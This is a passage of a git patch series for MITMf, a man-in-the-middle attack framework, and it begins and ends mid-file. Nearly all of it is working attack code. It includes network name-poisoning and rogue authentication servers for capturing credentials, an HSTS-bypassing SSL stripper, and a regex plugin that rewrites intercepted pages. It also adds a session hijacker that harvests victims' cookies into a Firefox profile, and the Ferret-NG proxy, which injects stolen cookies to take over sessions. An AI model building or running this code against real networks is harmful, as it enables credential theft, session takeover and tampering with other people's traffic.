+ for regex in self.regexes: + try: + data = re.sub(regex[0], regex[1], data) + + mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) + except Exception: + logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) + + self.ctable[ip] = time.time() + self.dtable[ip+hn] = True + + return {'request': request, 'data': data} + + return + + def add_options(self, options): + options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") + options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") + options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: [tab][new-line]") + options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") + + def _should_replace(self, ip, hn, mime): + return mime.find(self.mime) != -1 + + def _get_req_info(self, request): + ip = request.client.getClientIP() + hn = request.client.getRequestHostname() + mime = request.client.headers['Content-Type'] + + return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index bea6141..dbd7f69 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -19,18 +19,17 @@ # import threading +import sys from plugins.plugin import Plugin from twisted.internet import reactor from core.utils import SystemConfig from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner -from core.responder.wpad.WPADPoisoner import WPADPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter from core.responder.wpad.WPADPoisoner import WPADPoisoner -from core.responder.kerberos.KERBServer import KERBServer class Responder(Plugin): name = "Responder" @@ -48,18 +47,47 @@ class Responder(Plugin): try: config = self.config['Responder'] + smbChal = self.config['MITMf']['SMB']['Challenge'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) MDNSPoisoner().start(options, self.ourip) - KERBServer().start() NBTNSPoisoner().start(options, self.ourip) LLMNRPoisoner().start(options, self.ourip) if options.wpad: + from core.responder.wpad.WPADPoisoner import WPADPoisoner WPADPoisoner().start(options) + if self.config["Responder"]["MSSQL"].lower() == "on": + from core.responder.mssql.MSSQLServer import MSSQLServer + MSSQLServer().start(smbChal) + + if self.config["Responder"]["Kerberos"].lower() == "on": + from core.responder.kerberos.KERBServer import KERBServer + KERBServer().start() + + if self.config["Responder"]["FTP"].lower() == "on": + from core.responder.ftp.FTPServer import FTPServer + FTPServer().start() + + if self.config["Responder"]["POP"].lower() == "on": + from core.responder.pop3.POP3Server import POP3Server + POP3Server().start() + + if self.config["Responder"]["SMTP"].lower() == "on": + from core.responder.smtp.SMTPServer import SMTPServer + SMTPServer().start() + + if self.config["Responder"]["IMAP"].lower() == "on": + from core.responder.imap.IMAPServer import IMAPServer + IMAPServer().start() + + if self.config["Responder"]["LDAP"].lower() == "on": + from core.responder.ldap.LDAPServer import LDAPServer + LDAPServer().start(smbChal) + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py new file mode 100644 index 0000000..3594c27 --- /dev/null +++ b/plugins/SSLstrip+.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import sys +import logging + +from plugins.plugin import Plugin +from core.utils import IpTables +from core.sslstrip.URLMonitor import URLMonitor +from core.dnschef.DNSchef import DNSChef + +class HSTSbypass(Plugin): + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + version = "0.4" + tree_output = ["SSLstrip+ by Leonardo Nve running"] + has_opts = False + + def initialize(self, options): + self.options = options + self.manualiptables = options.manualiptables + + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port']) + + URLMonitor.getInstance().setHstsBypass() + DNSChef.getInstance().setHstsBypass() + + def finish(self): + if not self.manualiptables: + if IpTables.getInstance().dns is True: + IpTables.getInstance().Flush() diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py new file mode 100644 index 0000000..baf163a --- /dev/null +++ b/plugins/SessionHijacker.py @@ -0,0 +1,187 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb +import threading +import os +import sys +import time +import logging +import sqlite3 +import json +import socket + +from plugins.plugin import Plugin +from core.publicsuffix.publicsuffix import PublicSuffixList +from urlparse import urlparse + +mitmf_logger = logging.getLogger("mitmf") + +class SessionHijacker(Plugin): + name = "Session Hijacker" + optname = "hijack" + desc = "Performs session hijacking attacks against clients" + implements = ["cleanHeaders"] #["handleHeader"] + version = "0.1" + has_opts = True + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.psl = PublicSuffixList() + self.firefox = options.firefox + self.mallory = options.mallory + self.save_dir = "./logs" + self.seen_hosts = {} + self.sql_conns = {} + self.sessions = [] + self.html_header="

Cookies sniffed for the following domains\n
\n
" + + #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires + #SQLite version 3.7.0 or later. You won't be able to read the database files + #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted + #or is not a database" message. + + sqlv = sqlite3.sqlite_version.split('.') + if (sqlv[0] <3 or sqlv[1] < 7): + sys.exit("[-] sqlite3 version 3.7 or greater required") + + if not os.path.exists("./logs"): + os.makedirs("./logs") + + if self.mallory: + t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) + t.setDaemon(True) + t.start() + + def cleanHeaders(self, request): # Client => Server + headers = request.getAllHeaders().copy() + client_ip = request.getClientIP() + + if 'cookie' in headers: + + if self.firefox: + url = "http://" + headers['host'] + request.getPathFromUri() + for cookie in headers['cookie'].split(';'): + eq = cookie.find("=") + cname = str(cookie)[0:eq].strip() + cvalue = str(cookie)[eq+1:].strip() + self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) + + mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) + + if self.mallory: + if len(self.sessions) > 0: + temp = [] + for session in self.sessions: + temp.append(session[0]) + if headers['host'] not in temp: + self.sessions.append((headers['host'], headers['cookie'])) + mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) + mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) + else: + self.sessions.append((headers['host'], headers['cookie'])) + mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) + mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) + + #def handleHeader(self, request, key, value): # Server => Client + # if 'set-cookie' in request.client.headers: + # cookie = request.client.headers['set-cookie'] + # #host = request.client.headers['host'] #wtf???? + # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) + # if self.urlMonitor.isClientLogging() is True: + # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) + # else: + # mitmf_logger.info(message) + + def mallory_server(self): + host = '' + port = 20666 + server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + server.bind((host,port)) + server.listen(1) + while True: + client, addr = server.accept() + if addr[0] != "127.0.0.1": + client.send("Hacked By China!") + client.close() + continue + request = client.recv(8192) + request = request.split('\n') + path = request[0].split()[1] + client.send("HTTP/1.0 200 OK\r\n") + client.send("Content-Type: text/html\r\n\r\n") + if path == "/": + client.send(json.dumps(self.sessions)) + client.close() + + def firefoxdb(self, host, cookie_name, cookie_value, url, ip): + + session_dir=self.save_dir + "/" + ip + cookie_file=session_dir +'/cookies.sqlite' + cookie_file_exists = os.path.exists(cookie_file) + + if (ip not in (self.sql_conns and os.listdir("./logs"))): + + try: + if not os.path.exists(session_dir): + os.makedirs(session_dir) + + db = sqlite3.connect(cookie_file, isolation_level=None) + self.sql_conns[ip] = db.cursor() + + if not cookie_file_exists: + self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") + self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") + except Exception, e: + print str(e) + + scheme = urlparse(url).scheme + scheme = (urlparse(url).scheme) + basedomain = self.psl.get_public_suffix(host) + address = urlparse(url).hostname + short_url = scheme + "://"+ address + + log = open(session_dir + '/visited.html','a') + if (ip not in self.seen_hosts): + self.seen_hosts[ip] = {} + log.write(self.html_header) + + if (address not in self.seen_hosts[ip]): + self.seen_hosts[ip][address] = 1 + log.write("\n
\n%s" %(short_url, address)) + + log.close() + + if address == basedomain: + address = "." + address + + expire_date = 2000000000 #Year2033 + now = int(time.time()) - 600 + self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) + + def add_options(self, options): + options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') + options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') + + def finish(self): + if self.firefox: + print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 148e84c..228d54f 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -18,8 +18,6 @@ # USA # -import logging - from sys import exit from core.utils import SystemConfig, IpTables from core.protocols.arp.ARPpoisoner import ARPpoisoner diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index f14778e..3693df6 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,6 +23,8 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image +mitmf_logger = logging.getLogger("mitmf") + class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" From d3e509d4cd33c4ee0dfe26040506c8d5a71ceea4 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Wed, 6 May 2015 23:07:59 +0200 Subject: [PATCH 11/20] Added error handling to DNS and SMB servers when port is in use Added check to see if a plugins options were called without loading the actual plugin --- config/mitmf.conf | 5 +++++ core/dnschef/DNSchef.py | 12 ++++++++---- core/protocols/smb/SMBServer_Responder.py | 9 +-------- core/protocols/smb/SMBserver.py | 11 ++++++++--- core/responder/imap/IMAPServer.py | 2 +- core/responder/ldap/LDAPServer.py | 2 +- core/responder/mssql/MSSQLServer.py | 4 ++-- mitmf.py | 16 +++++++++++++++- plugins/Responder.py | 2 +- plugins/SSLstrip+.py | 5 +++-- 10 files changed, 45 insertions(+), 23 deletions(-) diff --git a/config/mitmf.conf b/config/mitmf.conf index c76f951..8387fbb 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -23,6 +23,11 @@ rpcpass = abc123 [[SMB]] + + # + #Here you can configure MITMf's internal SMB server + # + #Set a custom challenge Challenge = 1122334455667788 diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index 34ea779..e1473a2 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -474,10 +474,14 @@ class DNSChef(ConfigWatcher): self.onConfigChange() self.startConfigWatch() - if self.config['MITMf']['DNS']['tcp'].lower() == 'on': - self.startTCP() - else: - self.startUDP() + try: + if self.config['MITMf']['DNS']['tcp'].lower() == 'on': + self.startTCP() + else: + self.startUDP() + except socket.error as e: + if "Address already in use" in e: + sys.exit("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/protocols/smb/SMBServer_Responder.py b/core/protocols/smb/SMBServer_Responder.py index 1b25456..b94b9ad 100644 --- a/core/protocols/smb/SMBServer_Responder.py +++ b/core/protocols/smb/SMBServer_Responder.py @@ -1,6 +1,3 @@ -################################################################################## -#SMB stuff starts here -################################################################################## class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -333,8 +330,4 @@ class SMB1LM(BaseRequestHandler): except Exception: self.request.close() - pass - -################################################################################## -#SMB Server stuff ends here -################################################################################## \ No newline at end of file + pass \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index ded9958..2081804 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,6 +1,7 @@ import logging import sys import threading +from socket import error as socketerror from impacket import version, smbserver, LOG from core.configwatcher import ConfigWatcher @@ -22,9 +23,13 @@ class SMBserver(ConfigWatcher): impacket_ver = version.VER_MINOR def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): - - self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) - self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) + + try: + self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) + except socketerror as e: + if "Address already in use" in e: + sys.exit("\n[-] Unable to start SMB server on port 445: port already in use") def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/responder/imap/IMAPServer.py b/core/responder/imap/IMAPServer.py index 67e6a55..6466b28 100644 --- a/core/responder/imap/IMAPServer.py +++ b/core/responder/imap/IMAPServer.py @@ -16,7 +16,7 @@ class IMAPServer(): t = threading.Thread(name="IMAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/core/responder/ldap/LDAPServer.py b/core/responder/ldap/LDAPServer.py index 4629f71..5d5c91a 100644 --- a/core/responder/ldap/LDAPServer.py +++ b/core/responder/ldap/LDAPServer.py @@ -20,7 +20,7 @@ class LDAPServer(): t = threading.Thread(name="LDAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/core/responder/mssql/MSSQLServer.py b/core/responder/mssql/MSSQLServer.py index 71d38a5..806df10 100644 --- a/core/responder/mssql/MSSQLServer.py +++ b/core/responder/mssql/MSSQLServer.py @@ -12,14 +12,14 @@ class MSSQLServer(): def start(self, chal): global Challenge; Challenge = chal - + try: mitmf_logger.debug("[MSSQLServer] online") server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL) t = threading.Thread(name="MSSQLServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/mitmf.py b/mitmf.py index 5263505..df3ed01 100755 --- a/mitmf.py +++ b/mitmf.py @@ -69,6 +69,9 @@ try: except Exception as e: print "[-] Failed to load plugin class {}: {}".format(p, e) + +arg_dict = dict() #dict containing a plugin's optname with it's relative options + #Give subgroup to each plugin with options try: for p in plugins: @@ -81,6 +84,9 @@ try: if p.has_opts: p.add_options(sgroup) + + arg_dict[p.optname] = vars(sgroup)['_group_actions'] + except NotImplementedError: sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name)) @@ -90,11 +96,19 @@ if len(sys.argv) is 1: args = parser.parse_args() +# Definitely a better way to do this, will need to clean this up in the future +# Checks to see if we called a plugin's options without first invoking the actual plugin +for plugin, options in arg_dict.iteritems(): + if vars(args)[plugin] is False: + for option in options: + if vars(args)[option.dest] is True: + sys.exit("[-] Called plugin options without invoking --{}".format(plugin)) + #first check to see if we supplied a valid interface myip = SystemConfig.getIP(args.interface) mymac = SystemConfig.getMAC(args.interface) -#Start logging +#Start logging log_level = logging.__dict__[args.log_level.upper()] logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") diff --git a/plugins/Responder.py b/plugins/Responder.py index dbd7f69..620e2b6 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -48,7 +48,7 @@ class Responder(Plugin): try: config = self.config['Responder'] smbChal = self.config['MITMf']['SMB']['Challenge'] - except Exception, e: + except Exception as e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py index 3594c27..887a6f0 100644 --- a/plugins/SSLstrip+.py +++ b/plugins/SSLstrip+.py @@ -22,7 +22,7 @@ import sys import logging from plugins.plugin import Plugin -from core.utils import IpTables +from core.utils import IpTables, SystemConfig from core.sslstrip.URLMonitor import URLMonitor from core.dnschef.DNSchef import DNSChef @@ -37,10 +37,11 @@ class HSTSbypass(Plugin): def initialize(self, options): self.options = options self.manualiptables = options.manualiptables + ip_address = SystemConfig.getIP(options.interface) if not options.manualiptables: if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port']) + IpTables.getInstance().DNS(ip_address, self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass() DNSChef.getInstance().setHstsBypass() From 79025dc77eb76e87854d114e86e9ce409b906a61 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Mon, 11 May 2015 03:13:45 +0200 Subject: [PATCH 12/20] Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and trasparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/ The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed. Replace plugin has been given it's own section in the config file currently the BeedAutorun and Javapwn plugins have to be cleaned up... BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin Tweaked the output of some plugins --- config/mitmf.conf | 10 +- core/configwatcher.py | 3 +- core/ferretNG/ClientRequest.py | 168 + core/ferretNG/CookieCleaner.py | 105 + core/ferretNG/DnsCache.py | 49 + core/ferretNG/FerretProxy.py | 24 + core/ferretNG/SSLServerConnection.py | 110 + core/ferretNG/ServerConnection.py | 193 + core/ferretNG/ServerConnectionFactory.py | 48 + core/ferretNG/URLMonitor.py | 85 + core/{publicsuffix => ferretNG}/__init__.py | 0 core/publicsuffix/publicsuffix.py | 106 - core/publicsuffix/publicsuffix.txt | 4909 ------------------- core/sergioproxy/ProxyPlugins.py | 28 +- core/sslstrip/ClientRequest.py | 17 +- core/sslstrip/ServerConnection.py | 65 +- core/utils.py | 45 - mitmf.py | 10 +- plugins/AppCachePoison.py | 33 +- plugins/BeefAutorun.py | 4 +- plugins/BrowserProfiler.py | 40 +- plugins/CacheKill.py | 26 +- plugins/FerretNG.py | 60 + plugins/Inject.py | 59 +- plugins/JavaPwn.py | 2 +- plugins/JsKeylogger.py | 27 +- plugins/Replace.py | 67 +- plugins/Responder.py | 3 +- plugins/SMBAuth.py | 12 +- plugins/SessionHijacker.py | 187 - plugins/Spoof.py | 7 +- plugins/Upsidedownternet.py | 19 +- plugins/plugin.py | 47 +- 33 files changed, 1080 insertions(+), 5488 deletions(-) create mode 100644 core/ferretNG/ClientRequest.py create mode 100644 core/ferretNG/CookieCleaner.py create mode 100644 core/ferretNG/DnsCache.py create mode 100644 core/ferretNG/FerretProxy.py create mode 100644 core/ferretNG/SSLServerConnection.py create mode 100644 core/ferretNG/ServerConnection.py create mode 100644 core/ferretNG/ServerConnectionFactory.py create mode 100644 core/ferretNG/URLMonitor.py rename core/{publicsuffix => ferretNG}/__init__.py (100%) delete mode 100644 core/publicsuffix/publicsuffix.py delete mode 100644 core/publicsuffix/publicsuffix.txt create mode 100644 plugins/FerretNG.py delete mode 100644 plugins/SessionHijacker.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 8387fbb..040eec3 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -94,6 +94,14 @@ subnet = 255.255.255.0 dns_server = 192.168.2.20 #optional +[Replace] + + [[Regex1]] + 'Google Search' = 'Google In My Pants' + + [[Regex2]] + "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" + [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. @@ -223,7 +231,7 @@ skip_in_mass_poison=1 #you can add other scripts in additional sections like jQuery etc. -[JavaPwn] +[BrowserPwn] # # All versions strings without a * are considered vulnerable if clients Java version is <= update version diff --git a/core/configwatcher.py b/core/configwatcher.py index 03f8e3c..2da6962 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -12,7 +12,6 @@ mitmf_logger = logging.getLogger('mitmf') class ConfigWatcher(FileSystemEventHandler): _instance = None - config = ConfigObj("./config/mitmf.conf") @staticmethod @@ -43,5 +42,5 @@ class ConfigWatcher(FileSystemEventHandler): try: self.config = ConfigObj("./config/mitmf.conf") except Exception as e: - mitmf_logger.warning("Error reloading config file: {}".format(e)) + mitmf_logger.error("Error reloading config file: {}".format(e)) pass diff --git a/core/ferretNG/ClientRequest.py b/core/ferretNG/ClientRequest.py new file mode 100644 index 0000000..ac6a80b --- /dev/null +++ b/core/ferretNG/ClientRequest.py @@ -0,0 +1,168 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import urlparse +import logging +import os +import sys +import random +import re + +from twisted.web.http import Request +from twisted.web.http import HTTPChannel +from twisted.web.http import HTTPClient + +from twisted.internet import ssl +from twisted.internet import defer +from twisted.internet import reactor +from twisted.internet.protocol import ClientFactory + +from ServerConnectionFactory import ServerConnectionFactory +from ServerConnection import ServerConnection +from SSLServerConnection import SSLServerConnection +from URLMonitor import URLMonitor +from CookieCleaner import CookieCleaner +from DnsCache import DnsCache + +mitmf_logger = logging.getLogger('mitmf') + +class ClientRequest(Request): + + ''' This class represents incoming client requests and is essentially where + the magic begins. Here we remove the client headers we dont like, and then + respond with either favicon spoofing, session denial, or proxy through HTTP + or SSL to the server. + ''' + + def __init__(self, channel, queued, reactor=reactor): + Request.__init__(self, channel, queued) + self.reactor = reactor + self.urlMonitor = URLMonitor.getInstance() + self.cookieCleaner = CookieCleaner.getInstance() + self.dnsCache = DnsCache.getInstance() + #self.uniqueId = random.randint(0, 10000) + + def cleanHeaders(self): + headers = self.getAllHeaders().copy() + + if 'accept-encoding' in headers: + del headers['accept-encoding'] + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding") + + if 'if-modified-since' in headers: + del headers['if-modified-since'] + + if 'cache-control' in headers: + del headers['cache-control'] + + if 'host' in headers: + if headers['host'] in self.urlMonitor.cookies: + mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) + headers['cookie'] = self.urlMonitor.cookies[headers['host']] + + return headers + + def getPathFromUri(self): + if (self.uri.find("http://") == 0): + index = self.uri.find('/', 7) + return self.uri[index:] + + return self.uri + + def handleHostResolvedSuccess(self, address): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address)) + host = self.getHeader("host") + headers = self.cleanHeaders() + client = self.getClientIP() + path = self.getPathFromUri() + url = 'http://' + host + path + self.uri = url # set URI to absolute + + if self.content: + self.content.seek(0,0) + + postData = self.content.read() + + hostparts = host.split(':') + self.dnsCache.cacheResolution(hostparts[0], address) + + if (not self.cookieCleaner.isClean(self.method, client, host, headers)): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies") + self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path)) + + elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): + if 'securelink' in headers: + del headers['securelink'] + + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url))) + self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url)) + + else: + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP") + #self.proxyViaHTTP(address, self.method, path, postData, headers) + port = 80 + if len(hostparts) > 1: + port = int(hostparts[1]) + + self.proxyViaHTTP(address, self.method, path, postData, headers, port) + + def handleHostResolvedError(self, error): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error)) + try: + self.finish() + except: + pass + + def resolveHost(self, host): + address = self.dnsCache.getCachedAddress(host) + + if address != None: + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address)) + return defer.succeed(address) + else: + return reactor.resolve(host) + + def process(self): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host'))) + host = self.getHeader('host').split(":")[0] + + deferred = self.resolveHost(host) + deferred.addCallback(self.handleHostResolvedSuccess) + deferred.addErrback(self.handleHostResolvedError) + + def proxyViaHTTP(self, host, method, path, postData, headers, port): + connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) + connectionFactory.protocol = ServerConnection + #self.reactor.connectTCP(host, 80, connectionFactory) + self.reactor.connectTCP(host, port, connectionFactory) + + def proxyViaSSL(self, host, method, path, postData, headers, port): + clientContextFactory = ssl.ClientContextFactory() + connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) + connectionFactory.protocol = SSLServerConnection + self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) + + def sendExpiredCookies(self, host, path, expireHeaders): + self.setResponseCode(302, "Moved") + self.setHeader("Connection", "close") + self.setHeader("Location", "http://" + host + path) + + for header in expireHeaders: + self.setHeader("Set-Cookie", header) + + self.finish() diff --git a/core/ferretNG/CookieCleaner.py b/core/ferretNG/CookieCleaner.py new file mode 100644 index 0000000..5ba393c --- /dev/null +++ b/core/ferretNG/CookieCleaner.py @@ -0,0 +1,105 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import string + +class CookieCleaner: + '''This class cleans cookies we haven't seen before. The basic idea is to + kill sessions, which isn't entirely straight-forward. Since we want this to + be generalized, there's no way for us to know exactly what cookie we're trying + to kill, which also means we don't know what domain or path it has been set for. + + The rule with cookies is that specific overrides general. So cookies that are + set for mail.foo.com override cookies with the same name that are set for .foo.com, + just as cookies that are set for foo.com/mail override cookies with the same name + that are set for foo.com/ + + The best we can do is guess, so we just try to cover our bases by expiring cookies + in a few different ways. The most obvious thing to do is look for individual cookies + and nail the ones we haven't seen coming from the server, but the problem is that cookies are often + set by Javascript instead of a Set-Cookie header, and if we block those the site + will think cookies are disabled in the browser. So we do the expirations and whitlisting + based on client,server tuples. The first time a client hits a server, we kill whatever + cookies we see then. After that, we just let them through. Not perfect, but pretty effective. + + ''' + + _instance = None + + def __init__(self): + self.cleanedCookies = set(); + self.enabled = False + + @staticmethod + def getInstance(): + if CookieCleaner._instance == None: + CookieCleaner._instance = CookieCleaner() + + return CookieCleaner._instance + + def setEnabled(self, enabled): + self.enabled = enabled + + def isClean(self, method, client, host, headers): + if method == "POST": return True + if not self.enabled: return True + if not self.hasCookies(headers): return True + + return (client, self.getDomainFor(host)) in self.cleanedCookies + + def getExpireHeaders(self, method, client, host, headers, path): + domain = 